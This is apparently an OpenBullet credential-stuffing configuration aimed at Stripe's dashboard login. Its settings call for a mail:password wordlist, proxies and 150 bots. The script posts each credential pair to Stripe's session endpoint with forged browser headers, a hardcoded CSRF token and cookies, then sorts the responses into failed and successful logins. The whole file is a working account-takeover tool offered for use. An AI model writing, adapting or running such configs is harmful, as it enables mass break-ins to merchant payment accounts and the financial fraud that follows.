[SETTINGS]
{
  "Name": "Stripe",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2019-08-17T02:06:44.0019652+02:00",
  "AdditionalInfo": "",
  "Author": "HorusGod",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION CurrentUnixTime -> VAR "UNIX" 

FUNCTION UnixTimeToISO8601 "<UNIX>" -> VAR "TIME" 

PARSE "<TIME>" LR "" "T" -> VAR "DATE" 

REQUEST POST "https://dashboard.stripe.com/ajax/sessions" 
  CONTENT "email=<USER>&password=<PASS>&backup_code=&remember=true&g-recaptcha-response=&phone_code=&challenge_phone_code=&otp_code=&merchant=&redirect=&invite_code=&account_invite=&invite=&csrf_token=55TAnJ1_hRgxz1MsZMpTAk786s6sIUDHx_8BF0HDoCWjwjI9LaFdOjmOS-JBXPmsf93cDOh952Rfqxgnuh_N6w%3D%3D&recovery_token=&t=&io_blackbox=&source=react" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Host: dashboard.stripe.com" 
  HEADER "Origin: https://dashboard.stripe.com" 
  HEADER "Referer: https://dashboard.stripe.com/login" 
  HEADER "stripe-livemode: true" 
  HEADER "stripe-version: <DATE>" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "x-stripe-csrf-token: 55TAnJ1_hRgxz1MsZMpTAk786s6sIUDHx_8BF0HDoCWjwjI9LaFdOjmOS-JBXPmsf93cDOh952Rfqxgnuh_N6w==" 
  HEADER "x-stripe-manage-client-revision: 309cde4d55a7fef91222b3e1b2d65016b13d65bb" 
  HEADER "Cookie: country=US; locale=en; scfc=4; site_sid=f68e0449-52c8-4338-b205-2d808bed3b8d; cid=9a57a34e-fba8-4d4e-b7bf-3f9d8fc2052c; __stripe_orig_props=%7B%22referrer%22%3A%22%22%2C%22landing%22%3A%22https%3A%2F%2Fstripe.com%2F%22%7D; __stripe_mid=cad5ae9e-c491-4c0f-92d7-13aed29066c7; __extfc=1; machine_identifier=cU91GKC%2FMJgaof1Gu3reyLuayf34kBmVrSVIyj1J8gswOo2upT4lf7gnVXxTfXFCzME%3D; private_machine_identifier=XnqR00B3BvBk%2F%2BqWUD517hByE8aZebxRWja3wboVCyynYU9%2BcUMdJBq6iHaEk0RbcmE%3D; __stripe_sid=18fa78bc-75f3-41c0-8d01-573a8268de3f; stripe.csrf=jIxhUVny3--9-hv0t2RmmMm2tUj4SSiqMUljzQPw7uPI2pPw6SwHzbW7AzqS8sw2-JeDirwVjwmpHXr9-CyDLQ%3D%3D" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Wrong email or password" 
  KEYCHAIN Success OR 
    KEY "\",\"csrf_token\":\"" 

